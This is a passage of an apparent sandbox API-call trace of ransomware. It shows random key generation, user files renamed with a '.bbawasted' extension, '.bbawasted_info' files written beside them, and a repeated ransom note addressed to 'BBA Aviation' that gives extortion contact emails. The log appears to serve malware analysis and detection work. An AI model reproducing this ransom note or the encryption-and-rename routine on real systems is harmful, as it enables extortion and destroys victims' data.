KEY:\r\n[begin_key]BG7OGjp/KfJgeVoZstXyGyMlIafW6Ncsc7ulxDemKNpFQB+WRQuhPfFljK9ah8iW\r\nbvKgD4BzYuxGy2d4ktwr7gVwU74re3FrhZC5nqd/UsJ48xTOuGSJ6lrpSMZO52VW\r\nnpM3xTWSr+hHB0wPL4RaTtNseH20u4qvAU1oIdGjAFmrexPJF/wLlRAv/8bjBlf6\r\n5ruT6XHlg6AmHFDXbPVfyD7UghFf1Ojo/qnt5OBZdeiW7y0ODVU/MDN+CDwV8f5U\r\nquL3e54YCTqIuZoJtSimdJdNF5TEKRefBTmifnqdpBnJcGpZ2eirgj74oa2pqCCP\r\nbMhSxPgneZO3AjLaYgJhxbgdtij7aP7doym9/6PEH/Cv4Q942bL4M40Nd7dAsLqp\r\nhc9gw58aNvtKFa4Du7aByIcOh5WkAjwmexa7k+86oGo7OnLs5uPn7g5RGv9uTaOY\r\nN6wPqrMgoNrk7iYrjEDf/iMoNKjmMkHzAL1nuHB4Pe/n4fb3kuIMVxtRtfVJe3PJ\r\nac9+hguhSAnGRfDjn6DkceDpGHoxPfJM8FB8wwfhq3VSCC2hc5coPcfhPOji2Bgw\r\n9WyMZ0Qem86RUXCzOD2Wgq36DZl8v9dRrVTxt6aaeihEPzVHglas5Dgb1H2SPrT6\r\nvrqtENeWW/MrXckX887u0UGeaOlrMkSq8MhQ8DbC6nX=[end_key]\r\nKEEP IT\r\n") returned 984 [0201.807] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0201.807] WriteFile (in: hFile=0x288, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0201.807] SetEndOfFile (hFile=0x288) returned 1 [0201.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0201.810] CloseHandle (hObject=0x288) returned 1 [0202.033] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0202.034] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3110 | out: hHeap=0x660000) returned 1 [0202.034] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6570) returned 1 [0202.034] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0202.034] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0202.035] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf") returned 76 [0202.035] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2a2) returned 0x6aecf0 [0202.035] lstrcpyW (in: lpString1=0x6aed88, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0202.035] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0202.035] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a65f8) returned 1 [0202.036] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0202.036] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0202.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.bbawasted_info" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tm.blf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0202.036] WriteFile (in: hFile=0x288, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0202.037] SetEndOfFile (hFile=0x288) returned 1 [0202.038] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0202.038] lstrcpyW (in: lpString1=0x6aed88, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0202.038] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tm.blf"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tm.blf.bbawasted")) returned 1 [0202.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tm.blf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0202.039] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0202.040] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x10000 [0202.040] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10000) returned 0x640000 [0202.040] CloseHandle (hObject=0x290) returned 1 [0202.083] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0202.084] CloseHandle (hObject=0x294) returned 1 [0202.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0202.084] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6bd0) returned 1 [0202.085] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0202.085] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0202.085] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6bd0) returned 1 [0202.085] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0202.085] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0202.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0202.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0202.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0202.223] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ohePlbBR9tMA4nLQkEYmcjR5vwgd1DHtU5o6oJyqwMTMYyPMw1L1ORoKnZQePRlH\r\nxgD1J+Yxo8RSIKqcefdLuJQYDRALBcWkZKH/lpOFkP4fde1UW6wTO+wNLd26lRaC\r\nH0/crSlSTu1bDLxzoFoU/lMTaXapaj3aA0xA+1nPK3CRTSBeyIa53pBUVXEEtJya\r\nBM2fR+euWzCJUM3YYBIqor7c3xS6PLkUx6hOJqDoGtn5dizdJoRaAuMo28i3H63H\r\nbQjQWB/8ws2NY9PmrHaHIlKcvkQwALJezikBAaGXrZhtlIl46TFfrLoLwUf5Brt3\r\ndSSx1u5roZn6BNTlIPFAsuBF3uHCyE+hB5LD6MW1ZlGRgzkqOEOg+m/09avrNs95\r\n1BNN22zmR4/OMUyVpdjsJMtRdx+F6s4/5VPoB4CWNqzKe1rsQWllI6xiiIEuhLR/\r\nocM5TSJqksrYxWCdssbMUjObGkw2XNmnt6ymneuBQ82Zc2icCNBw1rFXv8LFkkCI\r\nDq3RxhN+f4iRKflrUj6MCTN61rntB/OZwDZDR1j8gzPYBwsvSBsLW6EJihYGcqcs\r\nH+TSGTUxTuuKhOSQzVZN4ovATHyWAPp+3wGCGpH1SBGrjQewsDWyVhnJsTn0d9QV\r\naq0AwOhVypy8PJbny12OBcYzlCsUUMM0LmgWEwe6DAW=[end_key]\r\nKEEP IT\r\n") returned 984 [0202.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0202.223] WriteFile (in: hFile=0x288, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0202.223] SetEndOfFile (hFile=0x288) returned 1 [0202.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0202.225] CloseHandle (hObject=0x288) returned 1 [0202.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0202.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac208 | out: hHeap=0x660000) returned 1 [0202.229] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6680) returned 1 [0202.229] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0202.229] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0202.229] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0202.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2ec) returned 0x6aecf0 [0202.229] lstrcpyW (in: lpString1=0x6aedd2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0202.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0202.229] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6ce0) returned 1 [0202.230] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0202.230] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0202.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms.bbawasted_info" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tmcontainer00000000000000000002.regtrans-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0202.262] WriteFile (in: hFile=0x288, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0202.263] SetEndOfFile (hFile=0x288) returned 1 [0202.264] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0202.264] lstrcpyW (in: lpString1=0x6aedd2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0202.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tmcontainer00000000000000000002.regtrans-ms.bbawasted")) returned 1 [0202.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{4e074668-0c1c-11e7-a943-e41d2d718a20}.tmcontainer00000000000000000002.regtrans-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0202.265] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0202.266] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x80000 [0202.266] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80000) returned 0x1500000 [0202.266] CloseHandle (hObject=0x294) returned 1 [0202.404] UnmapViewOfFile (lpBaseAddress=0x1500000) returned 1 [0202.407] CloseHandle (hObject=0x280) returned 1 [0202.407] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0202.407] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a64e8) returned 1 [0202.408] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0202.408] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0202.409] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6928) returned 1 [0202.409] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0202.409] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0202.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0202.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0202.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0202.420] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]cTRPIyN5DktsfKjMsaBk/wUZdzTEod9kATwa81ydWrZqo8QdV/A098RQ2YtSEEar\r\nPDOvh8/i7TPqmrwAve05IN3kIriQXuk4SyTFl8rgvcNhQ2Xx00lw2/1mcHJMeNDX\r\no7ngZi5OE2U4dMRzDJGsb+eadKWQn1cgtqf6N/3azQUuf/uk8DXgVfgCHg5rgffl\r\n2LmOCaF2aQEkRDc4jvOoVBxKIW6BFDygQL0JeRVfLkb3Z7OjA3Hg5VT3E9A54cmm\r\naSME09lDvgqD8s3InynVD3NWLe7vgZ+VbZXX/jXc1A5QgxXbYmLVJe7h25va6kHg\r\nQvnFbGJUpRTFo4KPzYoxLnckGn8Iv53lah/oAWE1UycIIWnYDCyKGHv7xOGnjWTU\r\nuZlMLG+NVNLqx+KrDNxcS9OkSzDAg6NFfdmB4YLCumqyQXdeYZsK5z7N1l5e2pBW\r\nARrH6QODVuPosjJ6DC5Sd9Ag3OzP8h8kfXm8jkKTKKd2fiZ3FDorA6zIq5oiLxFW\r\n1xPk3DH5814U5/94t9nLmMC8WdXQmHbmC1+lap/3MtSeCOpNcP/0hd38ZwWrn5e6\r\nT3otrl4sT6uaEaTdlU12mUkuBLzB+IqTV2/QL+VzzBen7jZ1SfkBIp1fCjlx3w9I\r\nrO7YDNy9qqkttKi5q48kuPZWlBHFQe2OF/S6l8HJShv=[end_key]\r\nKEEP IT\r\n") returned 984 [0202.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0202.420] WriteFile (in: hFile=0x288, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0202.421] SetEndOfFile (hFile=0x288) returned 1 [0202.629] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0202.629] CloseHandle (hObject=0x288) returned 1 [0202.631] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0202.632] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac440 | out: hHeap=0x660000) returned 1 [0202.632] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a5f98) returned 1 [0202.633] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0202.633] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0202.633] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0202.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2ec) returned 0x6aecf0 [0202.633] lstrcpyW (in: lpString1=0x6aedd2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0202.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0202.633] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6818) returned 1 [0202.634] CryptGenRandom (in: hProv=0x6a6818, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0202.634] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0202.634] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms.bbawasted_info" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000001.regtrans-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0202.635] WriteFile (in: hFile=0x288, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0202.637] SetEndOfFile (hFile=0x288) returned 1 [0202.637] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.637] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0202.637] lstrcpyW (in: lpString1=0x6aedd2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0202.637] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000001.regtrans-ms.bbawasted")) returned 1 [0202.638] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000001.regtrans-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0202.638] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0202.638] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x80000 [0202.639] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80000) returned 0x1480000 [0202.639] CloseHandle (hObject=0x28c) returned 1 [0202.902] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0202.905] CloseHandle (hObject=0x294) returned 1 [0202.905] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0202.905] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a61b8) returned 1 [0202.906] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0202.906] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0202.906] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6020) returned 1 [0202.907] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0202.907] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0202.916] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0202.916] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0202.916] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0202.916] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]LRKX7LryOgaj0j3w/owq4HdQ5qhqOU3ADgvtbwz8Sd13YMllhHAR7QM9/xM5rtml\r\nJtrn5+2dcJXpwrJIxpb9SPexNCC8kBjUsS9REQM2V5m3K+IRWsCI12TT4Lb8L2c8\r\nKY0wxgVaelqWiVEDVlbFG2JVs2f7C1jKHXub+jUnYNAFGc3L7dlPQtgyG5JrEQgk\r\nP5jE0cUi8o2ZcOHN8378ZUWEKdBqsHq5bEy9ZCHuPCrI71XsM6lvi6WQRWu+hJXZ\r\nHq50ykg6MVxfjATjOYYpriNEOoojM7Tzficfalo/USIRwnvsJE2q7iwzsSSJlP1O\r\nfRIZxfcmDd71YAJA/SFOeb2liv6yBI87DkopxedVcbphnPhDIZ7cLYbiUtaiQW43\r\nNTK5M92VftA//+yonQGwtlcC0jpPQnYCBW2B9RQUjS4GMiAiq1HviJ3ZoqhnAiee\r\n0FLhxo3qnwkZ2s33HYROnDLPMBZJeyEE6Lm2xuqIJsa9/vT0RTtl0ZreY2X1EajC\r\nivZmFTZ9c5dj7uLJb5cEY2sGuAbjZzN0QyvT8UZgwUXohS1SHXROycudCKxXJda+\r\nu7IBSZbzYGg0Ss1c66C0JqJc4zqtFOud5HgU7fvaaDa5ang+f+gRsQ2T0Q30elK6\r\n53VVs2Ncy1biUqPbr7G5Ahd8KdJ0X+a2EHHuuP1oBtp=[end_key]\r\nKEEP IT\r\n") returned 984 [0202.916] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0202.916] WriteFile (in: hFile=0x288, lpBuffer=0x6bb6f0*, 